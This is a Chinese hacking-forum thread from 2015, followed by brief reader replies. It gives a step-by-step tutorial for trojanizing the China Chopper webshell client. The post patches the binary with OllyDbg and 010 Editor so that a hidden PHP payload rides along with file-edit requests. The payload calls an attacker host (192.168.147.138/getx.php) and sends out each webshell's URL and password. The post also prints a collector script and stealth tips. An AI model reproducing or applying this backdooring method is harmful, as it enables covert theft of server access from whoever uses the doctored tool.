查看: 7125|回复: 12

如何给中国菜刀添加隐蔽后门

  [复制链接]
  • TA的每日心情
    郁闷
    5 天前
  • 签到天数: 1167 天

    连续签到: 1 天

    [LV.10]以坛为家III

    查看他的品牌

    发表于 2015-7-12 11:50:01 | 显示全部楼层 |阅读模式
    文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。
    中国菜刀,不用多说,是大多黑阔经常使用的工具,具体使用方法,网上有很多教程,这里我讲下如何给菜刀添加隐蔽后门。
    1、后门如何触发
    这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。
    当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

    当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。
    2、菜刀脱壳
    在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。
    3、查看数据包,分析流程(右键-编辑)
    本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

    数据如下
    1. a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D
    复制代码
    一共有3个参数,
    a url解码后为@eval (base64_decode($_POST[z0]));
    z0先url解码,在base64解码为
    1. @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
    复制代码
    Z1先url解码,在base64解码为
    C:\\wamp\\www\\robots.txt
    稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。
    1. if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
    复制代码
    如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。
    4、使用OD分析
    使用OD打开中国菜刀,右键搜索字符串,结果如下:

    定位到php读取文的字符串处,点击进去到代码处

    可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。
    5、修改菜刀程序文件
    由上可知,字符串的地址为0x49ba94,查看内存数据,

    发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。
    这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。
    将后门字符串
    1. $F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
    复制代码
    放到文件841d0处
    打开010editor 将上述字符串复制到010editor中,

    由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

    使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

    保存文件,这样后门字符串就被我们添加到程序中了。
    6、使用OD修改程序代码
    用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。
    0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

    保存修改的文件即可。
    7、测试修改结果
    修改文件后,我们在看看菜刀-右键编辑,抓到数据包

    Z0解密后为
    1. @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();
    复制代码
    可见我们的后门代码也一起被发送到服务端执行了。
    编写加单的getx.php接收结果,
    1. getx.php:
    2. <?php
    3. $getx = $_GET["caidao"];                  
    4. $file = fopen("getx.txt","a+");
    5. fwrite($file,$getx);
    6. fwrite($file,"\r\n");
    7. fclose($file);
    8. ?>
    复制代码
    结果如下:

    8、后记
    通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

  • TA的每日心情
    开心
    2016-5-14 02:16
  • 签到天数: 286 天

    连续签到: 1 天

    [LV.8]以坛为家I

    发表于 2015-7-12 16:23:35 | 显示全部楼层

  • TA的每日心情
    擦汗
    2018-1-21 00:05
  • 签到天数: 538 天

    连续签到: 1 天

    [LV.9]以坛为家II

    发表于 2015-7-26 04:06:52 | 显示全部楼层
    深奥
  • TA的每日心情
    开心
    2016-8-9 08:58
  • 签到天数: 83 天

    连续签到: 1 天

    [LV.6]常住居民II

    发表于 2015-8-1 14:12:32 | 显示全部楼层
    不错...
  • TA的每日心情
    开心
    2015-12-27 12:08
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    发表于 2015-12-23 20:13:53 | 显示全部楼层
    虽然不懂,但是还是看完了
  • TA的每日心情
    慵懒
    2016-9-20 15:36
  • 签到天数: 49 天

    连续签到: 1 天

    [LV.5]常住居民I

    发表于 2016-1-19 08:52:19 | 显示全部楼层
    我可以弱弱的问一句:添加隐蔽后门有什么用吗??真心求教

    点评

    还有就是我应该在哪去下载菜刀???  详情 回复 发表于 2016-1-19 08:54
  • TA的每日心情
    慵懒
    2016-9-20 15:36
  • 签到天数: 49 天

    连续签到: 1 天

    [LV.5]常住居民I

    发表于 2016-1-19 08:54:24 | 显示全部楼层
    一个坏桔子 发表于 2016-1-19 08:52
    我可以弱弱的问一句:添加隐蔽后门有什么用吗??真心求教

    还有就是我应该在哪去下载菜刀???
  • TA的每日心情
    奋斗
    2016-12-30 08:36
  • 签到天数: 121 天

    连续签到: 3 天

    [LV.7]常住居民III

    发表于 2016-8-8 16:01:47 | 显示全部楼层
    学习了。谢谢分享。辛苦了
  • TA的每日心情

    2018-1-12 15:51
  • 签到天数: 17 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    发表于 2016-11-2 09:25:20 | 显示全部楼层
    看懂一点
  • TA的每日心情
    慵懒
    2017-7-26 14:41
  • 签到天数: 86 天

    连续签到: 1 天

    [LV.6]常住居民II

    发表于 2017-2-14 10:09:08 | 显示全部楼层
    厉害啊
  • TA的每日心情
    开心
    2017-6-11 16:42
  • 签到天数: 20 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    发表于 2017-2-16 00:03:51 | 显示全部楼层
    学习了
  • TA的每日心情

    2018-2-6 15:15
  • 签到天数: 64 天

    连续签到: 1 天

    [LV.6]常住居民II

    发表于 2017-5-5 11:48:32 | 显示全部楼层
    看不懂咋办
  • TA的每日心情
    开心
    2017-7-5 14:53
  • 签到天数: 4 天

    连续签到: 4 天

    [LV.2]偶尔看看I

    发表于 2017-7-2 21:57:08 | 显示全部楼层
    好文章,有实用价值,大牛!
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    站长推荐上一条 /1 下一条